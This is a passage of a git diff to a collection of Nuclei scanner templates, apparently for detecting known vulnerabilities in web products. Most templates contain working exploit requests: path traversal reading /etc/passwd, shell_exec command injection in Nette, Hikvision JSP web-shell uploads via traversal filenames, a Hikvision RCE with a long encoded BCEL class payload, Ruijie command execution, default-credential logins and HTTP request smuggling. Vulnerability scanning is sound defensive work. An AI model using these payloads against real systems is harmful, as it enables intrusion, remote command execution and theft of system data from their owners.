https://www.cvedetails.com/cve/CVE-2018-15535 + classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-score: 7.50 cve-id: CVE-2018-15535 cwe-id: CWE-22 - tags: cve,cve2018,lfi + requests: - method: GET path: - "{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/07/07 diff --git a/poc/cve/cve-2020-15227.yaml b/poc/cve/cve-2020-15227.yaml index 2bba2c812a..9a75579bdb 100644 --- a/poc/cve/cve-2020-15227.yaml +++ b/poc/cve/cve-2020-15227.yaml @@ -1,22 +1,34 @@ id: CVE-2020-15227 + info: - name: nette Framework RCE - author: nithissh - severity: high - reference: unknown - tags: cve,cve2020,nette,rce + name: Nette Framework RCE + author: becivells + severity: critical + description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-15227 + - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94 + - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E# + - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-15227 + cwe-id: CWE-74 + requests: - method: GET path: - - "{{BaseURL}}/index.php/nette.micro/?callback=shell_exec&cmd=id&what=-1" + - "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1" + matchers-condition: and matchers: - - type: word - words: - - "uid" - - "gid" - part: body - condition: and + + - type: regex + regex: + - "root:.*:0:0:" + - type: status status: - 200 diff --git a/poc/default/default-cred-hertzbeat.yaml b/poc/default/default-cred-hertzbeat.yaml new file mode 100644 index 0000000000..c332a19d4d --- /dev/null +++ b/poc/default/default-cred-hertzbeat.yaml @@ -0,0 +1,33 @@ +id: apache-hertzbeat-default-login + +info: + name: Apache HertzBeat Default Credentials + author: securitytaters + severity: high + description: Apache HertzBeat enables default admin credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://github.com/apache/hertzbeat?tab=readme-ov-file#1install-quickly-via-docker + tags: hertzbeat,default-login + +variables: + username: admin + password: hertzbeat + +http: + - raw: + - |- + POST /api/account/auth/form HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"type":0,"identifier":"{{username}}","credential":"{{password}}"} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"token":"eyJ' + - type: status + status: + - 200 diff --git a/poc/http/cl-te-http-smuggling.yaml b/poc/http/cl-te-http-smuggling.yaml index ddb83e064d..278b84146d 100644 --- a/poc/http/cl-te-http-smuggling.yaml +++ b/poc/http/cl-te-http-smuggling.yaml @@ -1,37 +1,35 @@ -id: CL-TE-http-smuggling - -info: - name: HTTP request smuggling, basic CL.TE vulnerability - author: pdteam, akincibor - severity: Low - -http: - - raw: - - |+ - POST / HTTP/1.1 - Host: {{Hostname}} - Connection: keep-alive - Content-Type: application/x-www-form-urlencoded - Content-Length: 6 - Transfer-Encoding: chunked - - 0 - - G - - |+ - POST / HTTP/1.1 - Host: {{Hostname}} - Connection: keep-alive - Content-Type: application/x-www-form-urlencoded - Content-Length: 6 - Transfer-Encoding: chunked - - 0 - - G - - unsafe: true - matchers: - - type: dsl - dsl: - - 'contains(body, "Unrecognized method GPOST")' \ No newline at end of file +id: CL-TE-http-smuggling +info: + name: HTTP request smuggling, basic CL.TE vulnerability + author: pdteam, akincibor + severity: Low +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + Content-Length: 6 + Transfer-Encoding: chunked + + 0 + + G + - |+ + POST / HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + Content-Length: 6 + Transfer-Encoding: chunked + + 0 + + G + + unsafe: true + matchers: + - type: dsl + dsl: + - 'contains(body, "Unrecognized method GPOST")' diff --git a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml index cd961f6e81..538f6fd6d5 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml @@ -1,27 +1,35 @@ id: HiKVISION info: - name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability - author: zerZero Trust Security Attack and Defense Laboratoryo - severity: medium + name: HiKVISION Comprehensive Security Management Platform Files Arbitrary File Upload Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high description: | - There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks + HiKVISION comprehensive security management platform files interface has an arbitrary file upload vulnerability, allowing attackers to upload arbitrary files through the vulnerability metadata: - fofa-query: app="HIKVISION-综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + http: - - method: GET - path: - - "{{BaseURL}}/artemis-portal/artemis/env" + - raw: + - | + POST /center/api/files;.html HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - matchers-condition: and - matchers: - - type: word - part: body - words: - - "profiles" + ------WebKitFormBoundary9PggsiM755PLa54a + Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" + Content-Type: application/zip + + <%out.print("test");%> - - type: status - status: - - 200 + ------WebKitFormBoundary9PggsiM755PLa54a-- + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "test.jsp")' + condition: and diff --git a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml index e86e8491d1..cd961f6e81 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml @@ -1,40 +1,27 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability - author: Zero Trust Security Attack and Defense Laboratory - severity: high + name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability + author: zerZero Trust Security Attack and Defense Laboratoryo + severity: medium description: | - There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets + There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks metadata: - fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - raw: - - | - POST /svm/api/external/report HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a + - method: GET + path: + - "{{BaseURL}}/artemis-portal/artemis/env" - ------WebKitFormBoundary9PggsiM755PLa54a - Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" - Content-Type: application/zip - - <%out.print("test");%> - - ------WebKitFormBoundary9PggsiM755PLa54a-- - - | - GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code_1 == 200' - - 'contains(body_1, "data")' - - 'status_code_2 == 200' - - 'contains(body_2, "test")' - condition: and + - type: word + part: body + words: + - "profiles" + + - type: status + status: + - 200 diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml index 7f081b05e0..7e328a8b1b 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml @@ -1,48 +1,50 @@ id: HIKVISION info: - name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file - author: Zero Trust Security Attack and Defense Laboratory + name: HHIKVISION iVMS-8700 upload Webshell file + author: zerZero Trust Security Attack and Defense Laboratory severity: high description: | - HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files + HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file metadata: fofa-query: icon_hash="-911494769" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" variables: - str1: '{{rand_base(6)}}' - str2: '{{rand_base(6)}}' - str3: '<%out.print("{{str2}}");%>' + str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' http: - raw: - | - POST /eps/resourceOperations/upload.action HTTP/1.1 + POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 Host: {{Hostname}} - User-Agent: MicroMessenger - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj - - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj - Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" + User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Content-Length: 184 + Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 + + --c4155aff43901a8b2a19a4641a5efa15 + Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" Content-Type: image/jpeg - {{str3}} - ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- + {{randstr}} + --c4155aff43901a8b2a19a4641a5efa15-- - | - GET /eps/upload/{{res_id}}.jsp HTTP/1.1 + GET /eps/upload/{{name}}.jsp HTTP/1.1 Host: {{Hostname}} extractors: - type: json - name: res_id + name: name json: - ".data.resourceUuid" internal: true matchers: - - type: dsl - dsl: - - body_2 == str2 + - type: word + words: + - '{{randstr}}' diff --git a/poc/other/Ruijie_EXCU_SHELL.yaml b/poc/other/Ruijie_EXCU_SHELL.yaml index fa762ac2f6..f2db119795 100644 --- a/poc/other/Ruijie_EXCU_SHELL.yaml +++ b/poc/other/Ruijie_EXCU_SHELL.yaml @@ -1,37 +1,33 @@ id: Ruijie info: - name: Ruijie NBR Router fileupload.php Arbitrary File Upload Vulnerability + name: Ruijie Switch WEB Management System EXCU_ SHELL author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - Ruijie NBR router has an arbitrary file upload vulnerability in the fileupload.php file, which allows attackers to upload arbitrary files to the server and obtain server privileges + Ruijie Switch WEB Management System EXCU_ SHELL metadata: - fofa-query: app="Ruijie-NBR路由器" - hunter-query: web.title="锐捷网络 --NBR路由器--登录界面" + fofa-query: body="img/free_login_ge.gif" && body="./img/login_bg.gif" + hunter-query: web.body="img/free_login_ge.gif"&&body="./img/login_bg.gif" http: - raw: - | - POST /ddi/server/fileupload.php?uploadDir=../../321&name=test.php HTTP/1.1 + GET /EXCU_SHELL HTTP/1.1 Host: {{Hostname}} - Accept: text/plain, */*; q=0.01 - Content-Disposition: form-data; name="file"; filename="111.php" - Content-Type: image/jpeg + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2852.74 Safari/537.36 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Cmdnum: '1' + Command1: show running-config + Confirm1: n - - - | - GET /321/test.php HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - req-condition: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - - 'status_code_2 == 200' - - 'contains(body_1, "test.php")' - - 'contains(body_2, "PHP Version")' + - 'contains(body_1, "configuration")' condition: and diff --git a/poc/other/attire.yaml b/poc/other/attire.yaml new file mode 100644 index 0000000000..0618f60e61 --- /dev/null +++ b/poc/other/attire.yaml @@ -0,0 +1,59 @@ +id: attire + +info: + name: > + Attire <= 2.0.6 - Authenticated (Contributor+) PHP Object Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f21cbe18-77e1-4a9a-96a0-74edaef0db3e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/attire/" + google-query: inurl:"/wp-content/themes/attire/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,attire,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/attire/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "attire" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.6') \ No newline at end of file diff --git a/poc/other/fluentform-026589d017c577988978620b6f7c244f.yaml b/poc/other/fluentform-026589d017c577988978620b6f7c244f.yaml new file mode 100644 index 0000000000..cae1262143 --- /dev/null +++ b/poc/other/fluentform-026589d017c577988978620b6f7c244f.yaml @@ -0,0 +1,59 @@ +id: fluentform-026589d017c577988978620b6f7c244f + +info: + name: > + Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder <= 5.1.18 - Missing Authorization to Authenticated (Subscriber+) Mailchimp Integration Modification + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8242e0f0-b9c5-46fe-b691-3275cd0f9a43?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/fluentform/" + google-query: inurl:"/wp-content/plugins/fluentform/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,fluentform,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "fluentform" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.1.18') \ No newline at end of file diff --git a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml index 7e328a8b1b..0ebd67934b 100644 --- a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml +++ b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml @@ -1,50 +1,27 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability metadata: - fofa-query: icon_hash="-911494769" - hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + fofa-query: app="HIKVISION-综合安防管理平台" + hunter-query: web.title="综合安防管理平台" -variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' - http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /bic/ssoService/v1/applyCT HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" - Content-Type: image/jpeg - - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- - - - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: name - json: - - ".data.resourceUuid" - internal: true + Content-Type: application/json + Testcmd: whoami + + {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} matchers: - type: word words: - - '{{randstr}}' + - "nt authority\\system" diff --git a/poc/remote_code_execution/spring-functions-rce.yaml b/poc/remote_code_execution/spring-functions-rce.yaml index f28360d6a7..d04177443d 100644 --- a/poc/remote_code_execution/spring-functions-rce.yaml +++ b/poc/remote_code_execution/spring-functions-rce.yaml @@ -1,44 +1,46 @@ id: CVE-2022-22963 info: - name: CVE-2022-22963 - Spring Cloud RCE - author: rdnt + name: Spring Cloud - Remote Code Execution + author: Mr-xn,Adam Crosser severity: critical - description: RCE on Spring cloud function SPEL - tags: cve,rce,spring,cve2022,injection + description: | + Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. + reference: + - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f + - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE + - https://tanzu.vmware.com/security/cve-2022-22963 + - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/ + - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection + - https://nvd.nist.gov/vuln/detail/CVE-2022-22963 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22963 - cwe-id: CWE-770 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 